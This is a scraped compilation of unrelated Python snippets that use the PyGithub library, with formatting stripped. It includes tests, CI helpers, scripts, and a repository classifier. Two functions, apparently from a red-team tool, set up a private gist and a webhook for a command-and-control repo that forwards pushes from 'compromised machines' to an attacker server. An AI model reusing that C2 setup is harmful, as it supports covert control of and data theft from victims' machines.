def main():
parser = ArgumentParser(description="Show a user's Github stars")
parser.add_argument('-u',
'--username',
help='Github Username',
type=str,
default=GITHUB_USERNAME)
args = parser.parse_args()
username = args.username
gh = Github(GITHUB_USERNAME, GITHUB_PASS)
usr = gh.get_user(username)
for repo in usr.get_starred():
print(u"{} ({}) @ {}".format(
repo.full_name, repo.description, repo.html_url))
python类Github()的实例源码
def search(self, query):
data = []
json_input = open(self.get_path("json_input.json"), "w")
gh = Github(self.token)
search = gh.search_repositories(query, sort='stars')
for repo in search:
field = {}
field["repo_id"] = repo.id
languages = repo.get_languages().keys()
stargazers = repo.get_stargazers_with_dates()
for lang in languages:
field["language_id"] = lang
for stargazer in stargazers:
field["stargazer_id"] = stargazer.user.id
field["time_value"] = stargazer.starred_at.strftime("%Y-%m-%dT%H:%S")
data.append(field)
input_data = json.dumps(data, indent=4, sort_keys=True)
json_input.write(input_data)
def create_private_gist(config, main_github_token, filename, content, description):
g = Github(main_github_token)
g_user = g.get_user()
gist = g_user.create_gist(False, {filename: github.InputFileContent(content)}, description)
# gists have a list of files associated with them, we just want the first one
# gist.files = {'filename': GistFile(filename), ...}
gist_file = [x for x in gist.files.values()][0]
config["gist_raw_contents_url"] = gist_file.raw_url
# The structure of the url is:
# https://gist.githubusercontent.com/<username>/<gist guid>/raw/<file guid>/<filename.txt>
#
# Since we're only uploading one file and we want to make the URL as concise as possible,
# it turns out we can actually trim off everything after /raw/ and it'll still give us what
# we want.
config["gist_raw_contents_url"] = config["gist_raw_contents_url"].split("/raw/")[0] + "/raw"
print("[*] Private gist content at:")
print("- %s" % config["gist_raw_contents_url"])
return config
# Return the content that will placed in the private gist
def create_c2_webhook(config):
print("[*] Creating GitHub webhook for C2 repo that will receive pushes from compromised machines ")
g = Github(config["main_github_token"])
g_user = g.get_user()
repo = g_user.get_repo(config["github_c2_repo_name"])
# this endpoint is defined in server/gitpwnd/controllers.py
webhook_endpoint = config["attacker_server"] + "/api/repo/receive_branch"
# We're using a self-signed cert, so we need to turn off TLS verification for now :(
# See the following for details: https://developer.github.com/v3/repos/hooks/#create-a-hook
hook_secret = str(uuid.uuid4())
params = {"url": webhook_endpoint, "content_type": "json", "secret": hook_secret, "insecure_ssl": "1"}
# PyGithub's create_hook doc:
# http://pygithub.readthedocs.io/en/latest/github_objects/Repository.html?highlight=create_hook
try:
repo.create_hook("web", params, ["push"], True)
except:
print("[!] Web hook already exists")
hook = repo.get_hooks()[0]
if "secret" not in hook.config.keys():
print("[!] Adding a secret to the hook...")
else:
hook_secret = input("Enter webhook secret (Github Repo > Settings > Webhooks > Edit > Inspect 'Secret' element): ")
new_hook_config = hook.config
new_hook_config["secret"] = hook_secret
hook.edit(name=hook.name, config=new_hook_config)
finally:
return hook_secret
# Automatically generate a new password for the gitpwnd server
# so we don't use a default one
def __init__(self):
if is_appengine_local():
secrets = DEBUG_CLIENT_SECRETS
else:
secrets = CLIENT_SECRETS
with open(secrets, 'r') as contents:
secrets = json.loads(contents.read())
github_token = secrets.get(TOKEN_KEY)
self.webhook_secret = secrets.get(WEBHOOK_SECRET)
if is_appengine_local():
self.reporter_host = DEBUG_CRASH_REPORTER_HOST
self.repo_name = '{0}/{1}'.format(DEBUG_OWNER, DEBUG_REPO)
else:
self.reporter_host = CRASH_REPORTER_HOST
self.repo_name = '{0}/{1}'.format(OWNER, REPO)
self.github_client = Github(login_or_token=github_token)
def __init__(self, config, agentid, issue):
self.config = config
self.agentid = agentid
self.issue = issue
#logging.debug(yaml.dump(config))
self.ghuser_name = config.github()['git_user_name']
self.ghtoken = config.github()['git_app_token']
self.ghrepo_name = config.github()['git_repo_name']
self.gh_rlimit = config.github()['git_rlimit']
self.ghcomm_limit = config.github()['git_comm_limit']
self.gh = Github(self.ghuser_name, self.ghtoken)
self.ghuser = self.gh.get_user()
self.ghrepo = self.ghuser.get_repo(self.ghrepo_name)
self.ghissue = self.ghrepo.get_issue(self.issue)
def update_organisation_repos(organisation, token, filename, excludes, include_forks):
"""Searches a Github organisation for repositories that can be
cloned, writes discovered repo URLs to a local file."""
github_client = Github(token)
org = github_client.get_organization(organisation)
printerr("Looking up {org} repositories (may take some time)".format(org=organisation))
repos = org.get_repos("public")
if not include_forks:
repos = (repo for repo in repos if not repo.fork)
clone_urls = _clone_urls(repos)
filtered = filter_excluded_repos(clone_urls, excludes)
with open(filename, "w") as f:
_write_repo_list(filtered, f)
printerr("Wrote list of repositories to {location}".format(location=filename))
return
def get_repository():
"""Get the GitHub repo specified in settings or the default.
If the repo doesn't exist, try to create it.
"""
try:
g = Github(**get_github_credentials())
if app_settings.GITHUB_ORG:
user = g.get_organization(app_settings.GITHUB_ORG)
else:
user = g.get_user()
try:
return user.get_repo(app_settings.GITHUB_REPO)
except UnknownObjectException:
logging.info("Creating repository {}".format(
app_settings.GITHUB_REPO
))
return user.create_repo(app_settings.GITHUB_REPO)
except GithubException:
logging.exception("Unable to configure Github connection.")
def __init__(self, config, assets):
# Params
self.config = config
self.assets = assets
self.newassets = []
# Github API
self.github = None
self.githubuser = None
self.githubrepo = None
self.release = None
# Initialize parent
Step.__init__(self, 'Upload the release',
Substep('Configure HTTPS download server', self.substep1),
Substep('Upload to Github', self.substep2))
def substep2(self):
"""Upload to Github"""
# Create release if not existant
if self.release is None:
self.release = self.githubrepo.create_git_release(
self.config['tag'],
self.config['project'] + ' ' + self.config['tag'],
self.config['message'],
draft=False, prerelease=self.config['prerelease'])
# Upload assets
for asset in self.newassets:
assetpath = os.path.join(self.config['output'], asset)
self.verbose('Uploading {}'.format(assetpath))
# TODO not functional
# see https://github.com/PyGithub/PyGithub/pull/525#issuecomment-301132357
self.release.upload_asset(assetpath)
def create_or_update_comment(self, message):
"""
Notify a list of GitHub user names that they should review this pull request. Only notifies
the users once.
:param reviewers: A list of GitHub user names that should review the PR
:param required: A list of GitHub user names that are required to review the PR
:param prefix: A prefix to append to any automated comments
"""
# see: https://github.com/blog/2178-multiple-assignees-on-issues-and-pull-requests
# see: https://github.com/PyGithub/PyGithub/issues/404
if not message:
return
existing_comment = self._get_existing_comment()
if existing_comment:
if existing_comment.body == message:
return
existing_comment.edit(message)
else:
self._pr.create_issue_comment(message)
def __init__(self, index='codetoname', page_num=0, page_size=30,
language='python', account=None, password=None):
self._es = elasticsearch.Elasticsearch()
self._es_index = index
self._page_num = page_num
self._page_size = page_size
self._language = language
self._total_page_num = 0
if account and password:
github_client = github.Github(account, password, per_page=page_size)
print('Hi, {}'.format(github_client.get_user().name))
else:
github_client = github.Github(per_page=page_size)
self._github_client = github_client
self._github_response = None
self._latest_repo_updated = None
self._latest_repo_index = False
self._update_searching_response()
def test__when_comment_data_is_valid__should_send_it_to_proper_github_endpoint(self):
proper_data = {'repository': 'repo', 'sha': '123abc', 'body': 'Comment body', 'jobName': 'job'}
request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request)
github_client = mock(spec=github.Github)
github_repository = mock(spec=github.Repository)
github_commit = mock(spec=github.Commit)
pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)
# given
when(request).json().thenReturn(async_value(proper_data))
when(CommentRequestData).is_valid_comment_data(proper_data).thenReturn(True)
when(github_client).get_repo('repo').thenReturn(github_repository)
when(github_repository).get_commit('123abc').thenReturn(github_commit)
when(github_commit).create_comment(body='job\nComments: Comment body')
# when
response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)
# then
assert response.status == 200
assert response.text == 'Comment ACK'
def test__when_status_data_is_ok__should_call_github_client_to_create_status(self):
proper_data = {'repository': 'repo', 'sha': '123abc', 'state': 'State', 'description': 'Description', 'context': 'Context', 'url': 'pr_url'}
request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
github_client = mock(spec=github.Github, strict=True)
github_repository = mock(spec=github.Repository, strict=True)
github_commit = mock(spec=github.Commit, strict=True)
pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)
# given
when(request).json().thenReturn(async_value(proper_data))
when(StatusRequestData).is_valid_status_data(proper_data).thenReturn(True)
when(github_client).get_repo('repo').thenReturn(github_repository)
when(github_repository).get_commit('123abc').thenReturn(github_commit)
when(github_commit).create_status(state='State', description='Description', target_url='pr_url', context='Context')
# when
response: aiohttp.web.Response = await pipeline_controller.handle_status(request)
# then
assert response.status == 200
assert response.text == 'Status ACK'
def test__when_github_entity_is_not_found__comment_should_return_404_response_with_github_explanation(self):
parameters = {'repository': 'repo', 'sha': 'null', 'body': 'Comment body', 'jobName': 'job'}
request = mock({'headers': {'Authorization': f'Token {self.API_TOKEN}'}}, spec=aiohttp.web_request.Request, strict=True)
github_client = mock(spec=github.Github, strict=True)
github_repository = mock(spec=github.Repository, strict=True)
pipeline_controller = PipelineController(github_client, mock(), self.API_TOKEN)
# given
when(request).json().thenReturn(async_value(parameters))
when(CommentRequestData).is_valid_comment_data(parameters).thenReturn(True)
when(github_client).get_repo('repo').thenReturn(github_repository)
github_exception_data = {'message': 'Not Found', 'documentation_url': 'https://developer.github.com/v3/'}
when(github_repository).get_commit('null').thenRaise(github.GithubException(404, github_exception_data))
# when
response: aiohttp.web.Response = await pipeline_controller.handle_comment(request)
# then
assert response.status == 404
assert response.reason == str(github_exception_data)
def test__when_setting_pr_sync_label__if_github_raises_more_then_3_times__timeout_error_should_be_raised(self):
github_client: github.Github = mock(spec=github.Github, strict=True)
github_controller = GithubController(github_client, mock(), mock(), mock())
github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
mock(spec=asyncio)
# when
when(github_client).get_repo('repo')\
.thenRaise(github.GithubException(404, 'repo not found'))\
.thenRaise(github.GithubException(404, 'repo not found'))\
.thenReturn(github_repository)
when(github_repository).get_issue(43)\
.thenRaise(github.GithubException(404, 'repo not found'))
when(asyncio).sleep(1)\
.thenReturn(async_value(None))\
.thenReturn(async_value(None))\
.thenReturn(async_value(None))
# then
with pytest.raises(TriggearTimeoutError) as timeout_error:
await github_controller.set_pr_sync_label_with_retry('repo', 43)
assert str(timeout_error.value) == 'Failed to set label on PR #43 in repo repo after 3 retries'
def test__when_setting_pr_sync_label__if_github_returns_proper_objects__pr_sync_label_should_be_set(self):
github_client: github.Github = mock(spec=github.Github, strict=True)
github_controller = GithubController(github_client, mock(), mock(), mock())
github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
github_issue: github.Issue.Issue = mock(spec=github.Issue.Issue, strict=True)
# given
when(github_client).get_repo('repo')\
.thenReturn(github_repository)
when(github_repository).get_issue(43)\
.thenReturn(github_issue)
expect(github_issue, times=1)\
.add_to_labels('triggear-pr-sync')
# when
result = await github_controller.set_pr_sync_label_with_retry('repo', 43)
# then
assert result is None
def test__when_get_repo_labels_is_called__only_label_names_are_returned(self):
github_client: github.Github = mock(spec=github.Github, strict=True)
github_controller = GithubController(github_client, mock(), mock(), mock())
github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True)
other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True)
# given
when(github_client).get_repo('repo')\
.thenReturn(github_repository)
when(github_repository).get_labels()\
.thenReturn([label, other_label])
# when
result: List[str] = github_controller.get_repo_labels('repo')
# then
assert result == ['label', 'other_label']
def test__get_pr_labels__should_return_only_label_names(self):
github_client: github.Github = mock(spec=github.Github, strict=True)
github_controller = GithubController(github_client, mock(), mock(), mock())
github_repository: github.Repository.Repository = mock(spec=github.Repository.Repository, strict=True)
label: github.Label.Label = mock({'name': 'label'}, spec=github.Label.Label, strict=True)
other_label: github.Label.Label = mock({'name': 'other_label'}, spec=github.Label.Label, strict=True)
github_issue: github.Issue.Issue = mock({'labels': [label, other_label]}, spec=github.Issue.Issue, strict=True)
when(github_client).get_repo('repo')\
.thenReturn(github_repository)
when(github_repository).get_issue(25)\
.thenReturn(github_issue)
labels: List[str] = github_controller.get_pr_labels('repo', 25)
assert ['label', 'other_label'] == labels
def main():
parser = ArgumentParser(description=__doc__)
parser.add_argument("version")
parser.add_argument("--token", "-t", type=str,
help="GitHub API token to use")
args = parser.parse_args()
if args.token:
hub = Github(args.token)
else:
hub = Github()
repo = hub.get_user('UNINETT').get_repo('nav')
milestones = [m for m in repo.get_milestones(state='all')
if m.title == args.version]
if milestones:
mstone = milestones[0]
else:
print("Couldn't find milestone for {}".format(args.version),
file=sys.stderr)
sys.exit(1)
issues = repo.get_issues(state='closed', milestone=mstone)
for issue in sorted(issues, key=operator.attrgetter('number')):
print(format_issue(issue).encode('utf-8'))
def get_orgs(intent, session):
session_attributes = {}
reprompt_text = None
should_end_session = True
g = Github(session['user']['accessToken'])
orgs = g.get_user().get_orgs()
num_orgs = 0
org_strings = []
for org in orgs:
num_orgs += 1
org_strings.append(org.url[org.url.rfind('/')+1:])
if num_orgs > 0:
speech_output = \
'You belong to these organizations. ' + ','.join(org_strings)
else:
speech_output = "You don't have any organizations in this account."
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def merge_pr(intent, session, dialog_state):
filled_slots = delegate_slot_collection(intent, dialog_state)
if intent != filled_slots:
return filled_slots
session_attributes = {}
reprompt_text = None
should_end_session = True
repo_name = filled_slots['REPONAME']['value']
pr_number = filled_slots['PRNUMBER']['value']
g = Github(session['user']['accessToken'])
repo = g.get_repo(repo_name)
pr = repo.get_pull(pr_number)
if pr.mergable():
pr.merge()
speech_output = 'pull request ' + pr_number + ' merged.'
else:
speech_output = 'pull request ' + pr_number + ' cannot be merged.'
return build_response(session_attributes, build_speechlet_response(
intent['name'], speech_output, reprompt_text, should_end_session))
def __init__(self):
config = configparser.ConfigParser()
config.read("github.conf")
fileUsername = config.get("DEFAULT", "username")
filePassword = config.get("DEFAULT", "password")
fileToken = config.get("DEFAULT", "token")
if not fileUsername and not fileToken:
logger.error("Username and Token is not filled in github.conf file. Please input login data.")
raise LookupError("github.conf is not properly filled.")
if fileToken:
self.api = Github(fileToken)
else:
self.api = Github(fileUsername, filePassword)
def main(argv=None, test=False):
arguments = docopt(__doc__, argv=argv)
status = arguments['--status']
commit = arguments['--commit-hash']
user = arguments['--username']
password = arguments['--password']
token = arguments['--token']
url = arguments['--url']
repo = arguments['--repo']
context = arguments['--context']
description = arguments['--description']
print "Setting status %s for commit %s." % (status, commit)
if token:
g = Github(token)
elif user and password:
g = Github(user,password)
r = g.get_repo(repo)
c = r.get_commit(commit)
s = c.create_status(status, target_url=url, description=description, context=context)
if test:
return s
def main(argv=None, test=False):
arguments = docopt(__doc__, argv=argv)
head = arguments['--head']
base = arguments['--base']
token = arguments['--token']
repo = arguments['--repo']
title = arguments['--title']
description = arguments['--description']
print "Pulling %s into %s in repo %s." % (head, base, repo)
if not title:
title = "Auto-generated pull request."
if not description:
description = "Auto-generated pull request."
g = Github(token)
r = g.get_repo(repo)
p = r.create_pull(head=head, base=base, title=title, body=description)
if test:
return p
def _batch_worker(queue_input, queue_output):
classifiers = classifier.get_all_classifiers()
try:
while True:
data = queue_input.get(True, 1)
sum_results = utility.get_zero_class_dict()
classifier_results = dict()
for c in classifiers:
result = c.classify(data)
classifier_results[c.name()] = result
for key in sum_results.keys():
if key in result:
sum_results[key] += result[key] / len(classifiers)
queue_output.put((data, utility.get_best_class(sum_results), sum_results, classifier_results))
except queue.Empty:
sys.exit(0)
##
# \brief Learning worker for parallel processing.
#
# \param input List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
# \param queue_classifier multiprocessing.Queue containing classifier objects for learning.
def result_to_file(result, filename):
try:
with open(filename, 'w') as file:
for r in result:
file.write('{} {}\n'.format(r[0].get_repo_url(), r[1]))
except:
logging.error('Can not save results to {}'.format(filename))
##
# \brief Parsed the files in a directory and returns input for learning.
#
# The directory has to contain one file with the name of each class ('DEV', 'HW', 'EDU', 'DOCS', 'WEB', 'DATA', 'OTHER')
# containing lines with repositories of that class.
#
# \param path Path to directory.
# \return List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
def _get_input(self, github_object):
try:
metadata = github_object.get_repository_data()
input = [
metadata['fork'],
True if metadata['homepage'] is not None else False,
metadata['size'],
metadata['stargazers_count'],
metadata['watchers_count'],
metadata['has_wiki'],
metadata['has_pages'],
metadata['forks_count'],
metadata['open_issues_count'],
metadata['subscribers_count']
]
return input
except github.GithubError:
return [0.0 for _ in range(10)]
##
# \brief Classifies the repository based on the learned <em>Decision Tree</em>.
#
# \param data GitHub repository as github.Github object.
# \return Dictionary {CLASS: PROBABILITY}, where CLASS is a string containing the class label and
# PROBABILITY is a float in [0.0, 1.0] containing the probability that the repository belongs to the class.
def classify(self, data):
if 'version' not in self._model.config:
logging.error('Trying to use MetadataClassifier without learning first')
return utility.get_zero_class_dict()
if self._model.config['version'] != sklearn.__version__:
logging.error('Using MetadataClassifier with different scikit learn version (trained on: {}, used: {}) - relearn classifier first'.format(self._model.config['version'], sklearn.__version__))
return utility.get_zero_class_dict()
if self._tree is None:
self._tree = pickle.loads(base64.b64decode(self._model.config['tree']))
probability = self._tree.predict_proba([self._get_input(data)])
result = utility.get_zero_class_dict()
for i in range(len(self._tree.classes_)):
result[self._tree.classes_[i]] = probability[0][i]
return result
##
# \brief Trains a <em>Decision Tree</em> based on the provided repositories.
#
# \param learn List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.
def classify(self, data):
try:
language = data.get_repository_data()['language']
except github.GithubError:
return utility.get_zero_class_dict()
if language is None:
language = '_None_'
if language in self._model.config:
return self._model.config[language].copy()
else:
return utility.get_zero_class_dict()
##
# \brief Learns the distribution of the languages based on the provided repositories.
#
# \param learn List containing Tupel (GITHUB, CLASS), where GITHUB is the repository as a github.Github class and
# CLASS is the class label of the repository as a string.